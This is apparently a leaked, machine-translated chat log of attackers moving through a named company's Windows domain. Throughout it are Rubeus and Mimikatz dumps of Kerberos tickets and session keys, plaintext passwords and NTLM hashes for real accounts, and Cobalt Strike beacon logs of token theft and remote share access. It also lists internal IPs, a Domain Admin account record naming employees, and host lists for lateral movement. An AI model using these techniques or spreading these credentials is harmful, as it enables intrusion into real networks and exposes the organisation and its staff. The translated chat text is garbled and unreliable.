LOL the site is in english and the screens are russian))) https://habr.com/ru/company/tomhunter/blog/507140/ ``.
C:\Rubeus>Rubeus.exe changepw /ticket:doIFFjCCBRKgA...(snip)...== /new:Password123!
``https://m0chan.github.io/2019/07/31/How-To-Attack-Kerberos-101.htmlесли for today you will close then change it)`` that's how you can change their passwords ho
  UserName : iwam_gsccorp
  Domain : CORP
  LogonId : 0x5f97dbc1
  UserSID : S-1-5-21-1935655697-1715567821-1801674531-500
  AuthenticationPackage : Negotiate
  LogonType : NewCredentials
  LogonTime : 2/11/2021 5:06:01 PM
  LogonServer :
  LogonServerDNSDomain : CORP.TELEVISA.COM.MX
  UserPrincipalName : IWAM_GSCCORP@televisa.com.mx


    ServiceName : krbtgt/CORP.TELEVISA.COM.MX
    ServiceRealm : CORP.TELEVISA.COM.MX
    UserName : scvmmadmin
    UserRealm : CORP.TELEVISA.COM.MX
    StartTime : 2/12/2021 3:13:41 AM
    EndTime : 2/12/2021 1:13:41 PM
    RenewTill : 2/18/2021 5:28:41 PM
    Flags : name_canonicalize, pre_authent, initial, renewable, forwardable
    KeyType : rc4_hmac
    Base64(key) : z5AbAFLr5dm7xXuxnit3ZA==
    Base64EncodedTicket :

      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

``or on third-party resources, see githabc with this now
UserName : iwam_gsccorp
  Domain : CORP
  LogonId : 0xeccec
  UserSID : S-1-5-21-1935655697-1715567821-1801674531-500
  AuthenticationPackage : Kerberos
  LogonType : RemoteInteractive
  LogonTime : 1/29/2021 7:45:21 PM
  LogonServer : CORPKIODC04
  LogonServerDNSDomain : CORP.TELEVISA.COM.MX
  UserPrincipalName : IWAM_GSCCORP@televisa.com.mx


    ServiceName : krbtgt/CORP.TELEVISA.COM.MX
    ServiceRealm : CORP.TELEVISA.COM.MX
    UserName : IWAM_GSCCORP
    UserRealm : CORP.TELEVISA.COM.MX
    StartTime : 2/12/2021 6:50:28 AM
    EndTime : 2/12/2021 4:50:28 PM
    RenewTill : 2/12/2021 7:43:12 PM
    Flags : name_canonicalize, pre_authent, initial, renewable, forwardable
    KeyType : aes256_cts_hmac_sha1
    Base64(key) : ecn2+faPRhcghzhFYY/6UjN8CqJC84CWfYAgujCMjd4=
    Base64EncodedTicket :

      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


``````
FILIAL\jcgarciae TVSAcrm8888!
FILIAL\Ivargasv 2d0a7cb1ea602f59dc9c7ee5bd11597b
```
 ```
133.1.11.173
133.1.45.190
10.10.10.154
10.10.47.53
10.10.47.122
10.4.30.153
10.4.31.100
10.4.6.116
10.4.28.122
``Works Check the koba again``Tekesquitengo:1031:aad3b435b51404eeaad3b435b51404ee:8275f6a85d07a3b71dd639e9b0304b47:::``after you click on endpoint nothing happens what is the error?
forkcar.com
192.111.151.198:22220
Ms4g6n8CfMfQGukSAeM8EEu7VzWCLL7ArdH
\TVSADMIN 616d703b0c6c52f0db8ff43611ab4031 ``so you used a token```
Teemo1[CORPAZUUPM]SYSTEM */484|2021Feb12 18:45:09> steal_token 4512
[*] Tasked beacon to steal the steal_token from PID 4512
[+] host called home, sent: 24 bytes
[+] Impersonated CORP\T1812

Teemo1[CORPAZUUPM]SYSTEM */484|2021Feb12 18:45:48> shell dir \\10.7.0.55\C$
[*] Tasked beacon to run: dir \\10.7.0.55\C$
[+] host called home, sent: 61 bytes
[+] received output:
The user name or password is incorrect.

```
well I tried (``.
The request will be processed at a domain controller for domain corp.televisa.com.mx.

User name t1812
Full Name Servicio T1812
Comment Santa Fe Rep:4336636 Res1:JAVIER CRUZ BARRANCO Res2:ADRIAN RUIZ MONDRAGON (Alta) 08/01/2019 // Se agrego al grupo Domain Admins a peticion de Hugo Martinez Rocha por Correo electronico.
User's comment
Country/region code (null)
Account active Yes
Account expires Never

Password last set 2/12/2021 1:18:50 AM
Password expires 6/12/2021 1:18:50 AM
Password changeable 2/13/2021 1:18:50 AM
Password required Yes
User may change password Yes

Workstations allowed All
Logon script
User profile
Home directory
Last logon 2/11/2021 9:31:41 AM

Logon hours allowed All

Local Group Memberships *Account Operators *Server Operators
Global Group memberships *Servicio Basico *Domain Users
                             *User_PSO *Domain Admins
                             *Protected Users
``````
Teemo1[CORPAZUUPM]SYSTEM */484|2021Feb12 06:04:10> shell dir \\10.30.64.10\C$\Users
[*] Tasked beacon to run: dir \\10.30.64.10\C$\Users
[+] host called home, sent: 69 bytes
[+] received output:
 Volume in drive \10.30.64.10\C$ is Windows
 Volume Serial Number is 56D1-9C35

 Directory of \10.30.64.10\C$Users

02/11/2021 03:46 PM <DIR> .
02/11/2021 03:46 PM <DIR> .
11/21/2016 02:17 AM <DIR> public
05/22/2020 01:34 PM <DIR> SOPORTE-CITRIX
02/11/2021 03:46 PM <DIR> T1812
04/09/2020 09:36 PM <DIR> TVSADMIN
               0 File(s) 0 bytes
               6 Dir(s) 113,737,977,856 bytes free

```
this car should try to yank tickets tomorrow by 6na today all and watch interesting tickets check all servers[ ](https://mediaeveryone.com/group/corp-televisa-com-mx?msg=XrMJvE4ZDqCsAr6RT) what are you rich?
    ServiceName : krbtgt/CORP.TELEVISA.COM.MX
    ServiceRealm : CORP.TELEVISA.COM.MX
    UserName : CORPKLHLQRD01$
    UserRealm : CORP.TELEVISA.COM.MX
    StartTime : 2/11/2021 7:38:29 PM
    EndTime : 2/12/2021 5:38:29 AM
    RenewTill : 2/18/2021 7:38:29 PM
    Flags : name_canonicalize, pre_authent, initial, renewable, forwardable
    KeyType : aes256_cts_hmac_sha1
    Base64(key) : LJqX9Tm3yHdb3yUrp7QfI9Dz+5PB9czvC77TDF2/W0M=
    Base64EncodedTicket :

      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
      VklTQS5DT00uTVg=

``Wrong userName : CORPKLHLQRD01$ ``Yes, here's the vb64 ticket
    ServiceName : krbtgt/CORP.TELEVISA.COM.MX
    ServiceRealm : CORP.TELEVISA.COM.MX
    UserName : CORPKLHLQRD01$
    UserRealm : CORP.TELEVISA.COM.MX
    StartTime : 2/11/2021 7:38:28 PM
    EndTime : 2/12/2021 5:38:28 PM
    RenewTill : 2/18/2021 7:38:28 PM
    Flags : name_canonicalize, pre_authent, initial, renewable, forwardable
    KeyType : aes256_cts_hmac_sha1
    Base64(key) : 4LEdV2c6AR7LiGz0eUuKQNyO3Mrufj6J0E9qAqwDuo=
    Base64EncodedTicket :

      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
      VklTQS5DT00uTVg=
``[ ](https://mediaeveryone.com/group/corp-televisa-com-mx?msg=GmgDqd9y47E9i84we) I'm talking about this Ticket Granting
Group 2 - Ticket Granting Ticket
	 [00000000]
	   Start/End/MaxRenew: 2/11/2021 7:38:47 PM ; 2/12/2021 5:38:28 AM ;
	   Service Name (02) : krbtgt ; CORP.TELEVISA.COM.MX ; @ CORP.TELEVISA.COM.MX
	   Target Name (--) : @ CORP.TELEVISA.COM.MX
	   Client Name (01) : CORPKLHLQRD01$ ; @ CORP.TELEVISA.COM.MX ( $$Delegation Ticket$$ )
	   Flags 60210000 : name_canonicalize ; pre_authenticated ; forwardable ;
	   Session Key : 0x00000012 - aes256_hmac
	     ba056c87b98f366fc26d590017bc2139382f8b86a0f465afe8a4e71640a0c88f
	   Ticket : 0x00000012 - aes256_hmac ; kvno = 8 [...]
	 [00000001]
	   Start/End/MaxRenew: 2/11/2021 7:38:28 PM ; 2/12/2021 5:38:28 AM ; 2/18/2021 7:38:28 PM
	   Service Name (02) : krbtgt ; CORP.TELEVISA.COM.MX ; @ CORP.TELEVISA.COM.MX
	   Target Name (02) : krbtgt ; CORP.TELEVISA.COM.MX ; @ CORP.TELEVISA.COM.MX
	   Client Name (01) : CORPKLHLQRD01$ ; @ CORP.TELEVISA.COM.MX ( CORP.TELEVISA.COM.MX )
	   Flags 40e10000 : name_canonicalize ; pre_authent ; initial ; renewable ; forwardable ;
	   Session Key : 0x00000012 - aes256_hmac
	     e0b11d57673a011ecb886cf4794b8a40dc8edcc3abb9f8fa27413da80ab00eea
	   Ticket : 0x00000012 - aes256_hmac ; kvno = 8 [.]
``on the available server check the ticket during working hours+in corp? what domain are you in? is there a ticket kerb? | 0x3e4 | corpklhlqrd01$ @ CORP.TELEVISA.COM.MX | krbtgt/CORP.TELEVISA.COM.MX | 2/12/2021 5:38:29 AM ``
 ---------------------------------------------------------------------------------------------------------------------------------------
 | LUID | UserName | Service | EndTime |
 ---------------------------------------------------------------------------------------------------------------------------------------
 | 0x3e4 | corpklhlqrd01$ @ CORP.TELEVISA.COM.MX | krbtgt/CORP.TELEVISA.COM.MX | 2/12/2021 5:38:29 AM
 | 0x3e4 | corpklhlqrd01$ @ CORP.TELEVISA.COM.MX | DNS/corpklhlqdc01.corp.televisa.com.mx | 2/12/2021 5:38:29 AM |
 | 0x3e4 | corpklhlqrd01$ @ CORP.TELEVISA.COM.MX | GC/CORPKLHLQDC01.corp.televisa.com.mx/televisa.com.mx | 2/12/2021 5:38:29 AM |
 | 0x3e4 | corpklhlqrd01$ @ CORP.TELEVISA.COM.MX | ldap/corpklhlqdc01.corp.televisa.com.mx/corp.televisa.com.mx | 2/12/2021 5:38:29 AM
 | 0x3e4 | corpklhlqrd01$ @ CORP.TELEVISA.COM.MX | cifs/CORPKLHLQDC01.corp.televisa.com.mx | 2/12/2021 5:38:28 AM |
 | 0x3e7 | corpklhlqrd01$ @ CORP.TELEVISA.COM.MX | krbtgt/CORP.TELEVISA.COM.MX | 2/12/2021 5:38:28 AM |
 | 0x3e7 | corpklhlqrd01$ @ CORP.TELEVISA.COM.MX | cifs/CORPKLHLQDC01 | 2/12/2021 5:38:28 AM |
 | 0x3e7 | corpklhlqrd01$ @ CORP.TELEVISA.COM.MX | cifs/corpsfedc02 | 2/12/2021 5:38:28 AM |
 | 0x3e7 | corpklhlqrd01$ @ CORP.TELEVISA.COM.MX | cifs/CORPSFEVMMLIB | 2/12/2021 5:38:28 AM |
 | 0x3e7 | corpklhlqrd01$ @ CORP.TELEVISA.COM.MX | host/CORPSFECRT03.corp.televisa.com.mx | 2/12/2021 5:38:28 AM |
 | 0x3e7 | corpklhlqrd01$ @ CORP.TELEVISA.COM.MX | RPCSS/CORPSFECRT03.corp.televisa.com.mx | 2/12/2021 5:38:28 AM |
 | 0x3e7 | corpklhlqrd01$ @ CORP.TELEVISA.COM.MX | cifs/CORPKLHLQDC01.corp.televisa.com.mx/corp.televisa.com.mx | 2/12/2021 5:38:28 AM
 | 0x3e7 | corpklhlqrd01$ @ CORP.TELEVISA.COM.MX | CORPKLHLQRD01$ | 2/12/2021 5:38:28 AM |
 | 0x3e7 | corpklklqrd01$ @ CORP.TELEVISA.COM.MX | LDAP/CORPKLHLQDC01.corp.televisa.com.mx | 2/12/2021 5:38:28 AM |
 | 0x3e7 | corpklhlqrd01$ @ CORP.TELEVISA.COM.MX | ldap/corpklhlqdc01.corp.televisa.com.mx/corp.televisa.com.mx | 2/12/2021 5:38:28 AM
 ---------------------------------------------------------------------------------------------------------------------------------------

``No, there is no check through the rubeusdlya abuza gpoja about the triage ticketmikaty same about pass ze ticket? I looked at a couple of servers before yesterday, before they flew away, where were YES tickets, but they are not katiliv prochekali on the servers available ticketmiket?well, according to bludhound that they do not have rights there, except genericAll)))) the group admin winel no access to cars in the group admin winel) yes, there is no access to that, check?it means re-check on the cars where related groups through `execute-assembly SharpSharesNG.exe shares list corp_srv.txt --alive --public-only ` see what car has access to the car, let me send a list of cars on each of the polzakov (on the polzakovak we are interested) `
OU=Grupos Globales
SNG15690.corp.televisa.com.mx
SFE15693.corp.televisa.com.mx
CHA15694.corp.televisa.com.mx
SNG15689.corp.televisa.com.mx
SNG15688.corp.televisa.com.mx
CHA15695.corp.televisa.com.mx

OU=SantaFe
SFCITRIXAPLAN2.corp.televisa.com.mx
SFCITRIXCLCONN2.corp.televisa.com.mx
SFCITRIXAPUAT1.corp.televisa.com.mx
QROCTXCLCONN1.corp.televisa.com.mx
SFCITRIXAPLAN1.corp.televisa.com.mx
CORPKIOBZT02_C1.corp.televisa.com.mx
CORPSFEWEB07.corp.televisa.com.mx
corpkiodb08.corp.televisa.com.mx
corpkioapp05.corp.televisa.com.mx
CORPSFEWEB09.corp.televisa.com.mx
CHA19003.corp.televisa.com.mx
SFE18620.corp.televisa.com.mx
SFE18588.corp.televisa.com.mx
SFE18590.corp.televisa.com.mx
CHA18594.corp.televisa.com.mx
cha19095.corp.televisa.com.mx
SFE18617.corp.televisa.com.mx
SNG18625.corp.televisa.com.mx
SFE18595.corp.televisa.com.mx
SNG15690.corp.televisa.com.mx
SFE15693.corp.televisa.com.mx
CHA15694.corp.televisa.com.mx
SNG15689.corp.televisa.com.mx
SNG15688.corp.televisa.com.mx
CHA15695.corp.televisa.com.mx
SFE18603.corp.televisa.com.mx
SFE18582.corp.televisa.com.mx
SFE19424.corp.televisa.com.mx
SFE17146.corp.televisa.com.mx
SFE20924.corp.televisa.com.mx
SFE19785.corp.televisa.com.mx
SFE20926.corp.televisa.com.mx
SFE19784.corp.televisa.com.mx
SFE18630.corp.televisa.com.mx
SFE20231.corp.televisa.com.mx
SFE12045.corp.televisa.com.mx
SFE17310.corp.televisa.com.mx
SFE20229.corp.televisa.com.mx
SFE15467.corp.televisa.com.mx
SFE16966.corp.televisa.com.mx
SFE16221.corp.televisa.com.mx
SFE18520.corp.televisa.com.mx
SFE20228.corp.televisa.com.mx
SFE20918.corp.televisa.com.mx
SFE15474.corp.televisa.com.mx
SFE20230.corp.televisa.com.mx
SFE20227.corp.televisa.com.mx
SFE18287.corp.televisa.com.mx
SFE19786.corp.televisa.com.mx
SFE21999.corp.televisa.com.mx
SFE14238.corp.televisa.com.mx
SFE21994.corp.televisa.com.mx
